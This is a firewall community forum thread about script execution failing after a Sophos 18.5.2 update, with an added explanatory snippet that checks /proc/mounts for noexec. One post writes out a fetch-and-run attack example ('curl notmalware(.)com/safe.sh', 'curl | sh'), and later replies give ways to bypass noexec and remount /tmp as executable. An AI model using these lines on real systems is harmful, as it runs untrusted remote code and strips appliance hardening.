

18.5.2 - Can't execute scripts anymore

We've been using a speed test script for years on our SG/XGs, just a heads up from 18.5.2 we now get permission denied.

Just to be sure, ran it on another 18.5.1 box, worked. Upgraded to 18.5.2, permission denied. May be worth checking any quality of life scripts you use to see if you're affected.



  • wget was removed on the appliance. Does your script use wget? 

    __________________________________________________________________________________________________________________

    • it does, do you know if there is an alternative? 

      https://github.com/rickoneeleven/pinescore/blob/master/111/ns_speedtest_v3.sh (I may remove this link in the future)

      ------------------------------------------------

      world's number one free ICMP monitoring platform: https://pinescore.com

      • wget is a tricky one. Because, just as you use wget to download something for a "speedtest", attackers use the same kind of feature for automated attacks and payloads. So to speak, the same kind of script could be a potential attack: getting access to a firewall, executing a script and downloading more content.

        You could use curl, like the script does as well. 


        • I'll try and give it a re-work, thanks


          • If the intended reason to remove wget from the firewall was only security, why is curl still available?

            There's nothing stopping an attacker from using "curl notmalware(.)com/safe.sh > file.sh" and then executing it.

            Or even curl | sh


            If a post solves your question use the 'Verify Answer' button.

            Ryzen 7900 + Mellanox ConnectX-3 (KVM) v22 EAP @ Home

            • Hey, cut it out, you're going to leave me with no options :)


            • "curl" is blocked too. But actually, I don't think curl or wget are blocked, as I can wget or curl down the original file fine from the command line; it's just when I run the script that I get permission denied, even if I remove the #!/bin/sh first line.

              So it looks like calling an executable file in any way is blocked. Is there a workaround? Even if I remove the .sh extension, it's still permission denied.


              • You need to give execute permission with chmod +x ns_speedtest_v4.sh

                Example: (screenshot)



                • Sorry, I'd left that bit out of the screenshot; same issue. Maybe it works on v19. Do you have any 18.5.2s to try?


                  • Could be additional enhancements to protect the system itself. V19.0 EAP1 is not at the same stage of the release cycle as MR2.

                    The question remains, why would anybody execute scripts? 


                    • Can you use "cat /proc/mounts" to see if /tmp is mounted with noexec?

                      If it is, you can remount it with exec permissions.

                      * (I'm on v19 EAP 1.)

                      EDIT: Also, I don't remember if this still works, but if you cat and pipe to sh, it should execute the script. (This should bypass filesystems that are mounted with noexec.)

                      Example: "cat test.sh | sh"


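The reply above suggests reading /proc/mounts to see whether /tmp carries noexec. The following POSIX sh snippet is an added example (not code from the thread or from Sophos) that parses text in the /proc/mounts format and reports whether a given mount point has a given option. The function names (mount_opt_state, tmp_noexec_state) and the SAMPLE_MOUNTS text are constructed for illustration; the live /proc/mounts is only read if it exists.

```shell
#!/bin/sh
# Added example: inspect /proc/mounts-style text for a mount option.
# mount_opt_state MOUNTS_TEXT MOUNTPOINT OPTION prints "set", "unset" or
# "absent" (mount point not listed). Taking the text as an argument lets it
# run against a saved copy of the file as well as the live one.
mount_opt_state() {
    mounts=$1; mp=$2; opt=$3
    # /proc/mounts fields: device mountpoint fstype options dump pass.
    # A path can be mounted more than once; the last line is the one in effect.
    opts=$(printf '%s\n' "$mounts" | awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }')
    if [ -z "$opts" ]; then
        echo absent
        return 0
    fi
    # Wrap in commas so "noexec" does not match a longer option name by accident.
    case ",$opts," in
        *",$opt,"*) echo set ;;
        *) echo unset ;;
    esac
}

# Constructed sample in /proc/mounts format (not captured from a real appliance).
SAMPLE_MOUNTS='rootfs / rootfs rw 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /var/tmp tmpfs rw,nosuid,nodev,relatime 0 0'

# The question asked in the thread: is /tmp mounted noexec?
# Uses the sample text unless mounts text is passed as the first argument.
tmp_noexec_state() {
    mount_opt_state "${1:-$SAMPLE_MOUNTS}" /tmp noexec
}

echo "sample /tmp noexec: $(tmp_noexec_state)"
if [ -r /proc/mounts ]; then
    echo "live /tmp noexec: $(tmp_noexec_state "$(cat /proc/mounts)")"
fi
```

On the sample text the function reports "set" for /tmp and "unset" for /var/tmp. Note that noexec only stops the kernel from executing files on that filesystem directly; as the reply points out, an interpreter fed the file on stdin is not affected, so noexec is a defence-in-depth measure against dropped binaries rather than a boundary for anyone who already has a shell. Remounting /tmp with exec, as later posts describe, removes that measure for the rest of the uptime.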

                      • thank you, you've been very helpful. I'm back in business. 


                        • Just had the same hiccup, for exactly the same reason, thanks!

                          For those wondering, it's as simple as:

                          mount -o remount,exec /tmp